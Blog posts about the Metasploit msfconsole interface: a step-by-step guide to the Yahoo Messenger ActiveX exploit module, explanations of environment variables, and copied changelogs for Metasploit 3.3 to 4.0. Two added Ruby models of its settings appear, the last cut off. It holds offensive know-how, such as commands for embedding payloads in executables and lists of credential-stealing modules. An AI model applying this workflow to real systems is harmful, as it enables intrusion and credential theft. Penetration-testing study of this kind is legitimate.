2011. 10. 6. 21:16

windows/browser/yahoomessenger_server



The show exploits command lists the available exploit modules.



The target we are going to attack is
Yahoo Messenger ..~~.. ActiveX Control Buffer Overflow


First,
the info command: gives a variety of information about an exploit module, namely the exploitable platforms and prerequisites, details of the payload, a description of the exploit, and references to external information sources.



In the msfconsole interface,
it provides detailed information on the payload, NOPs and encoders. The payload section shows the size of the space available for the payload, the number of characters avoided during payload generation, and the key information. The MSF engine key is used to decide which payload to use in the exploit. The NOP section shows the key information as well as the registers that the NOP sled must not modify.


use command > loads an exploit module. When an exploit module is selected, a temporary environment is loaded on top of the global environment. The temporary environment inherits every variable of the global environment; where a temporary and a global variable share a name, the temporary variable takes precedence.

Once an exploit module is selected, the msfconsole interface switches from main mode to exploit mode.



In exploit mode, the show command displays information specific to the exploit module instead of listing the available exploit modules, encoders and NOPs.


help lists the commands available in exploit mode.


In exploit mode, the show command takes targets, payloads, options and advanced as arguments.

show targets lists the valid target platforms for the exploit module we selected (yahoo). In MSF the exploit configuration depends on the kind of remote platform the target application is running on, and the MSF engine builds the exploit based on the selected target platform.
For the target, we


show payloads


The check command tests a remote host for a specific vulnerability; not every exploit module supports check.
This exploit does not support check.


exploit


<Exploitation process in the MSFCONSOLE interface>
1. Set the default encoder and NOP generator.
2. List the available exploit modules.
3. Select an exploit module.
4. Select the target platform.
5. Set the exploit options.
6. Set the advanced options.
7. Set the payload.
8. Run the check command.
9. Run the exploit.

Posted by Triany
2011. 10. 6. 18:35
Source: 오픈소스 툴킷을 이용한 실전해킹 절대 내공 (Penetration Tester's Open Source Toolkit) _ Johnny Long

msfconsole interface


- msfconsole, the most powerful interface, provides fine-grained control over the framework environment, option setting for exploit modules, and an interactive command line for launching exploits.



msfconsole commands
[Help] help
The help command brings up the help menu.


[Exit the interface] exit, quit
msf > exit
msf > quit


[reload]
If exploits or payloads are updated while the msfconsole interface is running, the reload command applies the update.
command: Strangely, on my version 4.0 the reload command shows "Unknown command: reload". Why is that?

[version]
Shows the version of the msfconsole interface.



[cd command]
Used when you want to run a command that msfconsole does not define. This is very useful during a penetration test because other tools such as nmap or Nikto can be run without leaving the console. Commands such as ls are not implemented in msfconsole. In our exploit the command is passed to the Cygwin environment and executed there.



MSF environment
The msfconsole interface uses the environment for settings of the interface itself, exploit options and payload options, and also to pass information between exploit modules and the framework engine.
Environment variables are divided into global and temporary variables.
The setg and unsetg commands set global environment variables.
When an exploit module is loaded, its temporary environment variables are loaded with it.
When a global and a temporary environment variable collide, the temporary variable's value is used.

[setg] Sets the value of a global environment variable, or prints the contents of all global environment variables
ex )
 msf > setg RHOST 192.168.1.1
 RHOST -> 192.168.1.1

 msf > setg
 AlternateExit : 2
 DebugLevel : 0
 Encoder : Msf::Encoder::PexFnstenvMov
 Logging : 0
 Nop: Msf::Nop::Pex
 RHOST : 192.168.1.1
 RandomNops: 1

      command: -> In my case, since nothing had been set with setg, the message "No entries in data store." came up.

[unsetg] clears the value of a global environment variable.
 ex)
  msf > unsetg RHOST
 
  msf > setg
  AlternateExit : 2
  DebugLevel : 0
  Encoder : Msf::Encoder::PexFnstenvMov
  Logging : 0
  Nop: Msf::Nop::Pex
  RandomNops: 1


[save] The save command saves all global and temporary environment variables to /.msf/config; these saved variables are loaded again each time the interface starts.
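The two environment layers described above (use on top of setg/unsetg, temporary winning on a name clash, save/reload), as an added Ruby model that is not Metasploit's own code; the module name and the RHOST/Nop values are taken from this page, the 10.0.0.5 override is constructed, and the config path is a parameter instead of /.msf/config.

```ruby
require "json"
require "tmpdir"

# Minimal model of the msfconsole environment: a global layer (setg/unsetg)
# and a temporary layer created when an exploit module is loaded with `use`.
class MsfEnvironment
  attr_reader :global, :temporary, :module_name

  def initialize
    @global = {}        # setg / unsetg operate on this layer
    @temporary = nil    # nil until `use` loads a module
    @module_name = nil
  end

  # setg NAME VALUE: set a global environment variable
  def setg(name, value)
    @global[name] = value
  end

  # unsetg NAME: clear a global environment variable
  def unsetg(name)
    @global.delete(name)
  end

  # use MODULE: load a temporary environment on top of the global one
  def use(module_name)
    @module_name = module_name
    @temporary = {}
  end

  # set NAME VALUE: only valid in exploit mode (after `use`)
  def set(name, value)
    raise "no module loaded; use <module> first" unless @temporary
    @temporary[name] = value
  end

  # Resolve a variable as the text describes: the temporary layer inherits
  # every global, and on a name clash the temporary value wins.
  def get(name)
    return @temporary[name] if @temporary&.key?(name)
    @global[name]
  end

  # The effective view the loaded module sees (what `show options` reports)
  def effective
    @global.merge(@temporary || {})
  end

  # save: persist both layers; the path is a parameter in this model
  def save(path)
    File.write(path, JSON.generate("global" => @global,
                                   "module" => @module_name,
                                   "temporary" => @temporary || {}))
    path
  end

  # Reload a saved config, as the interface does on each start
  def self.load(path)
    data = JSON.parse(File.read(path))
    env = new
    data["global"].each { |k, v| env.setg(k, v) }
    if data["module"]
      env.use(data["module"])
      data["temporary"].each { |k, v| env.set(k, v) }
    end
    env
  end
end

# Walk through the page's scenario; returns the value observed at each step.
def walkthrough
  env = MsfEnvironment.new
  env.setg("RHOST", "192.168.1.1")           # value from the page's setg example
  env.setg("Nop", "Msf::Nop::Pex")
  env.use("windows/browser/yahoomessenger_server")
  inherited = env.get("RHOST")               # temporary layer inherits the global
  env.set("RHOST", "10.0.0.5")               # constructed: clash -> temporary wins
  overridden = env.get("RHOST")
  env.unsetg("RHOST")                        # global gone, temporary copy remains
  after_unsetg = env.get("RHOST")
  env.setg("Nop", "Msf::Nop::Opty2")         # changing the default NOP generator
  nop = env.get("Nop")                       # visible: no temporary value shadows it
  { inherited: inherited, overridden: overridden, after_unsetg: after_unsetg, nop: nop }
end

if __FILE__ == $PROGRAM_NAME
  walkthrough.each { |k, v| puts "#{k}: #{v}" }
end
```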


   Metasploit Framework environment variables
In general, user-defined options use upper case, while advanced options use mixed case.

Framework options use mixed case, and internal variables start with an underscore ('_').



   [ General ]

   EnablePython
   - Whether to use external payloads written in Python via the InlineEgg library. The default is Disable, to avoid slowing down module loading, but it must be set to Enable in order to use InlineEgg-based payloads.

   DebugLevel
   - Verbosity of debug messages. 0 (the default) prints no debug messages; the highest level (most verbose) is 5.

   Logging
   - Whether to log every action and every successful exploit session. The action log records every attempt to call exploit() or check() in an exploit module. The session log records the exact time each command was sent and answered in a successful exploit session. Session logs can be viewed with the msflogdump command.

  LogDir
  - Directory in which session logs are stored. The default is the logs subdirectory of ~/.msf.

  AlternateExit
  - Works around a Perl interpreter bug that causes a segmentation fault when the framework exits. Setting this to 2 suppresses the segmentation fault message on exit.



[ Sockets ]

  UdpSourceIp
  - Source IP address used by all UDP requests (spoof).

  ForceSSL
  - Force all TCP connections to use SSL.

  ConnectTimeout
  - Socket connect timeout.

  RecvTimeout
  - Timeout for Recv(-1).

  RecvTimeoutLoop
  - Timeout for the Recv(-1) loop after the initial data.

  Proxies
  - Proxy modes for TCP sockets. A proxy string has the form TYPE:HOST:PORT:<extra fields>. Proxy entries are separated by '.' and are used in the order given.




[ Encoders ]

 Encoder
  - Selects the encoder (full path).

 EncoderDontFallThrough
  - Do not fall through to another encoder when the configured encoder module fails.





[ Nops ]

   Nop
   - Selects a specific NOP module (full path).

  NopDontFallThrough
  - Do not fall through to another NOP module when the configured NOP module fails.

  RandomNops
  - Randomize the x86 NOP sled where possible.





 [ Socket Ninja ]

 NinjaHost
 - Address of the socketNinja console

 NinjaPort
 - Port of the socketNinja console

 NinjaDontKill
 - Do not terminate the exploit after a socketNinja connection is made (multi-own).





[ Internal Variables ]

The following variables must not be set by the user or used inside modules.

  _Exploits
    Stores the hash of loaded exploit modules.

  _Payloads
    Stores the hash of loaded payloads.

  _Nops
    Stores the hash of loaded NOPs.

  _Encoders
    Stores the hash of loaded encoders.

  _Exploit
    Stores the currently selected exploit module.

  _Payload
    Stores the currently selected payload.

  _PayloadName
    Name of the currently selected payload.

  _BrowserSocket
    Used by the msfweb interface to track the socket back to the browser. //currently unsupported

   _Console
     Used to override the console class between UIs.


The show command takes one of exploits, payloads, encoders or nops as its argument. In the msfweb interface the default encoder and NOP generator can be changed with combo boxes. They can be changed in the msfconsole interface too, but there it has to be done on the command line.

To change the default NOP generator to the one using the Opty2 algorithm, first check the currently configured NOP generator with the setg command. Next, list the available NOP generators with the show command. Finally, change the default NOP generator with the command
setg Nop Msf::Nop::Opty2.

msf > setg Nops Msf::Nop::Opty2
Nops -> Msf::Nop::Opty2
msf >
Posted by Triany
2011. 10. 6. 18:12

SOURCE: http://mac.softpedia.com/progChangelog/Metasploit-Framework-Changelog-[29516.html


What's new in Metasploit Framework 4.0.0:

August 4th, 2011

Statistics:
· Metasploit now ships with 716 exploit modules, 361 auxiliary modules, and 68 post modules.
· 20 new exploits, 3 new auxiliary modules, and 14 new post modules have been added since the last release (3.7.2)

Highlights & New Features:
· This release marks the first major version change in five years. Please see the blog for more information.
· Several import parsers were rewritten to use Nokogiri for much faster processing of large import files.
· Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn't perfect nor is it nearly as complete as the Windows version, but many features already work.
· Java applet signing is now done directly in ruby, removing the need for a JDK for generating self-signed certificates.
· The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.
· On a related note, Linux installers also ship with a working pcaprub extension. Expect pcap support in Windows to come later: #5117.

New Modules since 3.7.2:
New Exploit Modules:
· VSFTPD v2.3.4 Backdoor Command Execution
· Java RMI Server Insecure Default Configuration Java Code Execution
· HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
· HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
· Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
· Black Ice Cover Page ActiveX Control Arbitrary File Download
· Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
· MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview
· RealWin SCADA Server DATAC Login Buffer Overflow
· Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
· Iconics GENESIS32 Integer overflow version 9.21.201.01
· Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
· Sielco Sistemi Winlog Buffer Overflow
· Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
· HP OmniInet.exe Opcode 20 Buffer Overflow
· HP OmniInet.exe Opcode 27 Buffer Overflow
· Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
· Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview

New Post-Exploitation Modules:
· Winlogon Lockout Credential Keylogger
· Windows Gather Microsoft Outlook Saved Password Extraction
· Windows Gather Process Memory Grep
· Windows Gather Trillian Password Extractor
· Windows PCI Hardware Enumeration
· Windows Gather FlashFXP Saved Password Extraction
· Windows Gather Local and Domain Controller Account Password Hashes
· Windows Gather Nimbuzz Instant Messenger Password Extractor
· Windows Gather CoreFTP Saved Password Extraction
· Internet Download Manager (IDM) Password Extractor
· Windows Gather SmartFTP Saved Password Extraction
· Windows Gather Bitcoin wallet.dat
· Windows Gather Service Info Enumeration
· Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:
· John the Ripper Password Cracker Fast Mode
· Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
· Kaillera 0.86 Server Denial of Service
· 2Wire Cross-Site Request Forgery Password Reset Vulnerability
· SIPDroid Extension Grabber
· MSSQL Password Hashdump

Notable Features & Closed Bugs:
· Feature #4982 - Support for custom executable with psexec
· Feature #4856 - RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
· Feature #4578 - Update Nmap XML parsers to support Nokogiri parsing
· Feature #4417 - Post exploitation module to harvest OpenSSH credentials
· Feature #4015 - Increase test coverage for railgun
· Bug #4963 - Rework db_* commands for consistency
· Bug #4892 - non-windows meterpreters upload into the wrong filename
· Bug #4296 - Meterpreter stdapi registry functions create key if one doesn't exist
· Bug #3565 - framework installer fails on RHEL (postgres taking too long to start)

Armitage:
Armitage integrates with Metasploit 4.0 to:
· Take advantage of the new Meterpreter payload stagers
· Crack credentials with the click of a button
· Run post modules against multiple hosts
· Automatically log all post-exploitation activity



What's new in Metasploit Framework 3.7.0:

May 5th, 2011

Statistics:
· Metasploit now ships with 685 exploit modules, 355 auxiliary modules, and 39 post modules.
· 35 new exploits, 17 post-exploitation modules, and 15 auxiliary modules have been added since the last release.

Highlights & New Features:
Feature highlights:
· Support for SMB signing, enabling pass-the-hash and stolen password attacks against Windows 2008 Server environments.
· The Microsoft SQL Server mixin (and all modules) now supports NTLM authentication.
· Data import backend has undergone a rewrite, speeding up most import tasks by a factor of four.
· OS information is now normalized to make fingerprinting more accurate and easier to deal with.

Highlights from the new modules include:
· Apple iOS Backup File Extraction: Extract sensitive data from iTunes backup files (location, call history, SMS content, pictures, etc).
· Exploits for two different Adobe Flash vulnerabilities exploited in the wild.
· Code execution modules for MySQL and PostgreSQL when a valid login is available.
· Exploit for the Accellion File Transfer Appliance Default Encryption Key flaw found by Rapid7.
· Over ten new exploits for HP Network Node Manager (plus an HP OpenView exploit).
· Post-exploitation module for privilege escalation through the .NET Optimizer Service.
· Post-exploitation modules for stealing stored WinSCP and VNC passwords.



What's new in Metasploit Framework 3.5.1:

December 16th, 2010

· Statistics
· Metasploit now has 613 exploit modules and 306 auxiliary modules (from 551 and 261 respectively in v3.4)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (480K lines of Ruby)
· Over 85 tickets were closed since the last point release and over 130 since v3.4.0
· General
· Sessions now include additional information by default. This is often the username/hostname of the remote session.
· Dead sessions are now automatically detected and closed without requiring user interaction.
· The msfcli interface is now a thin wrapper around msfconsole; auxiliary modules and passive exploits now work.
· All modules now track which local user launched them (via module.owner)
· Resolve Windows error codes into descriptive strings
· Automatically choose a preferred "reverse" payload if none was specified
· Warn the user if an antivirus program has corrupted the installation (EICAR canary)
· A socks4a proxy auxiliary module is available capable of routing through a meterpreter session
· Host names will now resolve properly on Windows with Ruby 1.9.1+
· Improved performance and accuracy of FTP and telnet brute force scanners
· Payloads
· Java Meterpreter is now available for some Java exploits such as exploit/multi/browser/java_trusted_chain
· A race condition in concurrent incoming session handling has been fixed
· The reverse_https stager is more reliable through an additional wfs_delay
· The ReverseListenerBindAddress option can be used to override LHOST as the local bind address for reverse connect payloads
· The ReverseListenerComm option can be set to "local" to prevent the listener from binding through a Meterpreter pivot
· Bug fixes for proper socket cleanup in exploit and auxiliary modules, even after exceptions are thrown
· Allow the IPv6 Bind stagers to work over Teredo tunnels
· Plugins
· Lab plugin added to manage target VMs
· Support for managing Nessus scans from the console via Zate Berg's plugin
· Meterpreter Scripts
· All scripts now run in the context of an anonymous class, with access to shared methods
· A script has been added by scriptjunkie for automatically exploiting weak service permissions
· Tab completion for the "run" command now looks in ~/.msf3/scripts/meterpreter/
· All credential-related tools (credcollect, hashdump, etc) now use the new creds database table
· Meterpreter Core
· Only a single SSL certificate is generated for all Meterpreter sessions per instance of Metasploit
· The AutoSystemInfo option can be disabled if username, hostname, and admin status should not be automatically obtained
· RAILGUN has been merged into the STDAPI extension and x64 support has been added
· Support slow/laggy connections better through extended timeouts
· Automatically closed file, register, process, thread, and event handles through finalizers
· Search for files (using the Windows index where available)
· Database
· A new db_export command has been added that produces db_import compatible XML snapshots of a given workspace
· Web sites and web application data is now stored in the web_sites, web_pages, web_forms, and web_vulns tables
· Import of both NeXpose Raw XML and NeXpose Simple XML has been improved
· Import support has been added for Retina and NetSparker XML
· The Nessusv2 XML format now uses an improved SAX-based parser
· The connection pool size has been reduced to match PostgreSQL defaults
· Cracked credentials now have their own database table (creds) instead of being a subclass of notes
· New exploited_hosts table added to streamline bookkeeping of successful session generation
· db_import more robust in the face of badly-formatted data
· report_note and report_vuln now automatically create associated hosts and services in the database if absent
· GUI
· A new Java GUI has been created to replace the GTK interface, which relied on unmaintained and buggy libraries
· The new GUI uses the XMLRPC interface to control Metasploit
· It supports launching modules, viewing running jobs and sessions, and interacting with sessions
· It can generate, encode, and save payloads with the features of msfencode
· It integrates support for most Meterpreter scripts
· It provides support for handling plugins
· It supports database connection, and allows viewing the database as well as limited interaction with the database
· Deprecated
· The msfweb interface is no longer included. This interface was marked as unsupported 12 months ago and no suitable replacements were found.
· The GTK interface is no longer included and has been replaced by scriptjunkie's Java GUI that uses the XMLRPC protocol.
· The sqlite3 backend is no longer supported and may be removed entirely in an upcoming point release. Use PostgreSQL or MySQL instead.
· The VNC stage for the old DLL injection stager (patchup) has been removed due to compatibility issues
· Deprecated specific filetypes for db_import_* commands; users should use just "db_import"



What's new in Metasploit Framework 3.4.1:

October 20th, 2010

Statistics:
· Metasploit now has 551 exploit modules and 261 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (400K lines of Ruby)
· Over 100 tickets were closed since the last point release and over 200 since v3.3

General:
· The dns_enum auxiliary module now supports bruteforcing IPv6 AAAA records thanks to a patch from Rob Fuller
· Command shell sessions can now be automated via scripts using an API similar to Meterpreter
· The console can be automated using Ruby code blocks within resource files
· Initial sound support is available by loading the "sounds" plugin
· The Report mixin and report_* methods are now one-way, you can write to the database but not work with the results. This increases the scalability of the database.
· Many modules report information to the database by default now (auxiliary/scanner/*)
· Lotus Domino version, login bruteforce, and hash collector auxiliary modules
· Upgrade any command shell session to Meterpreter via sessions -u (Windows only)
· The VNC injection payload now uses the latest TightVNC codebase and bypasses Session 0 isolation
· Several modules were renamed to include their Microsoft Technet bulletin number, e.g. ie_xml_corruption is now ms08_078_xml_corruption
· Code can now interface directly with an installed Java Development Kit via a Java mixin. See the java_signed_applet exploit for an example.
· Tomcat and JBoss installations can be exploited to gain sessions (Windows x86/x64, Linux x86/x64)
· The msfencode utility can now generate WAR payloads for Tomcat and JBoss
· Oracle XDB SID brute forcing is much more comprehensive thanks to Thomas Ring
· The msfencode utility can now inject into an existing executable while keeping the original functionality
· The XMLRPC server has been improved and additional APIs are available
· The db_import command now supports NeXpose Simple XML, NeXpose Export XML, Nessus (NBE, XMLv1, XMLv2), QualysGuard XML, and Nmap
· The sqlite3 driver has been deprecated. To ease the transition away from sqlite3, the postgres driver is installed by default in the Linux installer.
· There is a new db_status command that shows which driver is currently in use and whether your database connection is active

Bruteforce Support:
· Account brute forcing has been standardized across all login modules
· Login and version scanning module names have been standardized
· The SSH protocol is now supported for brute force and fingerprint scans
· The telnet_login and ssh_login modules now create sessions
· MySQL is now supported for brute forcing, enumeration, service fingerprinting, and arbitrary SQL queries
· Postgres fingerprinting (pre-authentication) using the line numbers in the error messages
· Tomcat is now supported for brute forcing and session creation

Meterpreter:
· The Meterpreter process management APIs and commands can now see all processes on WinNT 4.0 -> Windows 7 (32 & 64)
· The Meterpreter can now migrate from 32 to 64 and from 64 to 32, in addition to using a new mechanism to do the migration.
· The Meterpreter adds the steal_token, drop_token, getprivs, and getsystem commands (including kitrap0d integration)
· The Meterpreter pivoting system now supports bidirectional UDP and TCP sockets
· The Meterpreter protocol handle now supports ZLIB compression of data blocks
· The Meterpreter can now take screenshots (jpeg) without process migration and bypasses Session 0 isolation
· The Meterpreter can now stage over a full-encrypted SSL 3.0 connection using the reverse_https stager
· The Meterpreter and Command Shell scripts are now evaluated in the context of a new Rex::Script object
· The "hashdump" Meterpreter script provides a safe way to dump hashes for the local user accounts
· Automatically route through new subnets with the auto_add_route plugin

Known issues:
· To deal with the myriad database synchronization issues, particularly in the sqlite3 driver, the database is write-only for the most part.
· When gems containing non-UTF8 characters are installed on the system, starting the framework fails with Encoding::UndefinedConversionError in ruby 1.9.x; this is bug #1914
· Interacting with a Meterpreter session while it is in the middle of migrating will cause the migration to fail and kill the session; this is bug #1360
· In some cases, backgrounded sessions have no output handle and can potentially lose data that should be printed to the console; this is bug #1982.



What's new in Metasploit Framework 3.3.3:

March 31st, 2010

· All exploits now contain a ranking that indicates how dangerous the default settings are to the target host.
· The search command now takes a -r option to specify a minimum ranking of modules to return.
· The db_autopwn and nexpose_scan commands now take a -R option to specify a minimum ranking of modules to run.
· The InitialAutoRunScript option has been added to Meterpreter, providing a way for exploits to specify required post-exploit tasks (migrate out of a dying process).
· jRuby 1.4.0 can be used to run some parts of the framework, however it is not supported or recommended at this time.
· The sessions command can now run a single command (-c) or a script (-s) on all open sessions at once.
· The Win32 EXE template is now smaller (37k from 88k).



What's new in Metasploit Framework 3.3.1:

December 6th, 2009

· Metasploit now has 453 exploit modules and 218 auxiliary modules (from 445 and 216 respectively in v3.3)
· Metasploit now integrates with all editions of NeXpose (see NeXpose_Plugin)
· The msfconsole now stores and loads history automatically
· The Linux installer now correctly unsets GEM_PATH to avoid gem installation conflicts
· Generated Windows executables are much more random and AV-resistant
· WMAP reporting now uses the notes table instead of a separate set of reporting tables
· Auxiliary scanners are now much more stable on Ruby 1.9.1
· Meterpreter migration sanity checks added
· The Windows installer now includes Nmap 5.10BETA1



What's new in Metasploit Framework 3.3:

November 17th, 2009

Statistics:
· Metasploit now has 443 exploit modules and 216 auxiliary modules (from 320 and 99 respectively in v3.2)
· Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net (375k lines of Ruby)
· Over 170 tickets were closed during the 3.3 development process

General:
· Ruby 1.9.1 is now supported and recommended
· Windows Vista and Windows 7 are now supported
· Major improvements in startup speed thanks to patches from Yoann Guillot

Windows:
· The msfconsole is now the primary user interface on Windows (using RXVT)
· The Windows installer now uses Ruby 1.9.1 (cygwin)
· The Windows installer now ships with Cygwin 1.7
· The Windows installer now comes in full and mini editions
· The Windows installer can be launched silently with /S /D=C:path
· The Windows installation is now portable and can be installed to USB
· The Windows installation works on 64-bit Windows if launched in Compatibility Mode
· The Windows installer now offers to install Nmap 5.0 for your convenience

Linux:
· Standalone Linux installers are now available for 32-bit and 64-bit Linux. These installers contain a complete execution environment, including Ruby 1.9.1, Subversion, and dependent libraries.
· The preferred installation location is /opt/metasploit3/msf3, please see the Ubuntu and generic Linux installation guides for more information.

msfconsole:
· The startup banner now includes the number of days since the last update and the svn revision
· The RbReadline library is used by default, allowing msfconsole to work on systems without libreadline
· The -L parameter to msfconsole now allows the system Readline to be used if necessary
· A new 'connect' command, similar to netcat, that can use meterpreter routes
· Colorized output on terminals that support it. This can be disabled (or forced on) with the 'color' command

msfencode:
· Win32 payloads can now be embedded into arbitrary executables using 'msfencode -t exe -x MYFILE.exe -o MYNEWFILE.exe'.
· Win64 payloads can now be embedded into arbitrary 64-bit executables using 'msfencode -a x64 -e x64/xor -t exe -o MYNEWFILE.exe'.
· The default executable size for generated Win32 binaries now depends on the size of data/templates/template.exe. As of the release, this file is approximately 80k.
· Payloads can be generated as VBS scripts using the -t vbs option to msfencode. Persistent (looping) payloads can be generated with -t loop-vbs.
· Payloads can be generated as VBA macros for embedding into Office documents. The output is in two parts, the first must be pasted into the Macro editor, the second (hex) must be pasted to the end of the word document.
· The x86/alpha_mixed and x86/alpha_upper encoders now accept the AllowWin32SEH option (boolean) to use a SEH GetPC stub and generate 100% alphanumeric output.

msfxmlrpcd:
· This is a standalone Metasploit server that accepts authenticated connections over SSL.
· The demonstration client, msfxmlrpc, can be used to call the remote API

Database:
· Database support is now active as long as rubygems and at least one database driver are installed. The only db_* plugins are no longer necessary and have been deprecated.
· The vulnerabilities table now references the host as the parent table and not the service. This allows vulnerability information to be ported that is not tied to an exposed service.

Exploits:
· All applicable exploits now have OSVDB references thanks to a major effort by Steve Tornio
· New aix/rpc_ttdbserverd_realpath exploit module, which targets latest versions of IBM AIX operating system (5.3.7 to 6.1.4)
· Support for the Oracle InstantClient Ruby driver as an exploit mixin
· Support for the TDS protocol (MSSQL/Sybase) using a custom native Ruby driver (MSSQL 2000 -> 2008)
· Extensive support for exploitation and post-exploitation tasks against Oracle databases
· Extensive support for exploitation and post-exploitation tasks against Microsoft SQL Server databases
· The browser_autopwn module was completely rewritten using much more robust fingerprinting methods
· SOCKS4, SOCKS5, and HTTP proxies work much better now

Payloads:
· The Windows stagers now support NX platforms by allocating RWX memory using VirtualAlloc. The stagers have been updated to perform reliable stage transfer without a middle stager requirement.
· The reverse_tcp stager now handles connection failures gracefully by calling EXITFUNC when the connection fails. This stager can also try to connect more than once, which is useful for unstable network connections. The default connect try is 5 and can be controlled via the ReverseConnectRetries advanced option. Setting this value to 255 will cause the stager to connect indefinitely.
· The reverse_tcp_allports stager has been added, this will cycle through all possible 65,535 ports trying to connect back to the Metasploit console
· The ExitThread EXITFUNC now works properly against newer versions of Windows
· The CMD payloads now indicate support for specific userland tools on a per-exploit level
· The Windows stagers now support Windows 7
· New payload modules for Linux on POWER/PowerPC/CBEA
· New payload modules for Java Server Pages (JSP)
· New payload modules for Windows x64
· New payload modules for IBM AIX operating systems (versions 5.3.7 to 6.1.4)

Auxiliary:
· Scanner modules now run each thread in its own isolated module instance
· Scanner modules now report their progress (configurable via the ShowProgress and ShowProgressPercent advanced options).
· A simple fuzzer API is now available as well as 15 example modules covering HTTP, SMB, TDS, DCERPC, WiFi, and SSH.
· Ryan Linn's HTTP NTLM capture module has been integrated
· Support for the DECT protocol and DECT mixins have been integrated (using the COM-ON-AIR hardware)
· Support for the Lorcon2 library including a new Ruby-Lorcon2 extension
· Addition of airpwn and dnspwn modules to perform spoofing with raw WiFi injection using Lorcon2
· The pcaprub extension has been updated to build and run properly under Ruby 1.9.1
· Max Moser's pSnuffle packet sniffing framework has been integrated into Metasploit

Meterpreter:
· The Meterpreter now uses Stephen Fewer's Reflective DLL Injection technique by default as opposed to the old method developed by skape and jt.
· The Meterpreter now uses OpenSSL to emulate a HTTPS connection once the staging process is complete. After metsrv.dll is initialized, the session is converted into a SSLv3 link using a randomly generated RSA key and certificate. The target side now sends a fake GET request through the SSL link to mimic the traffic patterns of a real HTTPS client.
· The Meterpreter AutoRunScript parameter now accepts script arguments and multiple scripts. Each script and its arguments should be separated by commas.
· The Meterpreter can now take screen shots using the 'espia' extension and the 'screenshot' command. To use this feature, enter "use espia" and "screenshot somepath.bmp" from the meterpreter prompt.
· The Meterpreter can now capture traffic on the target's network. This is handled in-memory using the MicroOLAP Packet SDK. This extension can buffer up to 200,000 packets at a time. To use this feature, enter "use sniffer" and "sniffer_start" from the meterpreter prompt.
· The Meterpreter now supports keystroke logging by migrating itself into a process on the target desktop and using the keyscan_start and keyscan_dump commands.
· The Meterpreter now supports the "rm" file system command.
· The Meterpreter now supports the "background" command for when Ctrl-Z isn't feasible.
· The Meterpreter now supports 64-bit Windows.
· Alexander Sotirov's METSVC has been added to the Metasploit tree and stub payloads are available to interact with it

Meterpreter POSIX:
· The basic framework for Meterpreter on Linux, BSD, and other POSIX platforms was completed by JR
· The stdapi extension has been partially ported to the POSIX platform

Meterpreter Scripts:
· All scripts now accept a "-h" argument to show usage

Deprecated:
· The msfgui interface is not actively maintained and is looking for a new community owner
· The msfweb interface is not actively maintained and is looking for a new community owner
· The msfopcode command line utility is disabled until the Opcode Database is updated
· The msfopcode client API is disabled until the Opcode Database is updated and restored

Wednesday, December 23, 2009

Metasploit Framework 3.3.3 Exploit Rankings

This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to prevent exploits below a certain rank from being used and limit the impact to a particular target.

The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The wiki page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:

msf> search -r great

From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:

msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi

msf (exploit/ms08_067_netapi) > exploit

[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
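The rank threshold that `search -r`, the MinimumRank global and `exploit -f` enforce is simple enough to model on its own. The following is an added example, not code from the Metasploit Framework: it orders the seven rank names the post lists (excellent down to manual) and applies the same "at or above the threshold" comparison for searching and for the run-time gate. The numeric weights and the module-to-rank sample catalogue are assumptions constructed for the demo; only the rank names, their order and the refusal wording come from the post.

```ruby
# Added example, not Metasploit's own code: a stand-alone model of the
# exploit-rank threshold behind `search -r`, `setg MinimumRank` and
# `db_autopwn -R`. Rank names and their order (best to worst) are taken from
# the release post; the numeric weights are an assumption made for this demo.
module RankDemo
  RANKS = {
    'excellent' => 600,
    'great'     => 500,
    'good'      => 400,
    'normal'    => 300,
    'average'   => 200,
    'low'       => 100,
    'manual'    => 0,   # lowest: allows every exploit to run
  }.freeze

  # Constructed sample catalogue (module path => rank) for the demo.
  # The ranks are illustrative, not looked up from the real modules.
  SAMPLE_MODULES = {
    'exploit/windows/smb/ms08_067_netapi'     => 'great',
    'exploit/windows/smb/psexec'              => 'excellent',
    'exploit/unix/webapp/qtss_parse_xml_exec' => 'excellent',
    'exploit/osx/samba/lsa_transnames_heap'   => 'average',
    'exploit/multi/samba/nttrans'             => 'low',
  }.freeze

  # Numeric weight of a rank name; unknown names are rejected rather than
  # silently treated as "manual", so a typo cannot loosen the threshold.
  def self.rank_value(name)
    RANKS.fetch(name.to_s.downcase) { raise ArgumentError, "unknown rank: #{name}" }
  end

  # True when +rank+ is at least as good as +minimum+.
  def self.meets?(rank, minimum)
    rank_value(rank) >= rank_value(minimum)
  end

  # Equivalent of `search -r <minimum>`: module paths at or above the threshold.
  def self.search(modules, minimum)
    modules.select { |_path, rank| meets?(rank, minimum) }.keys.sort
  end

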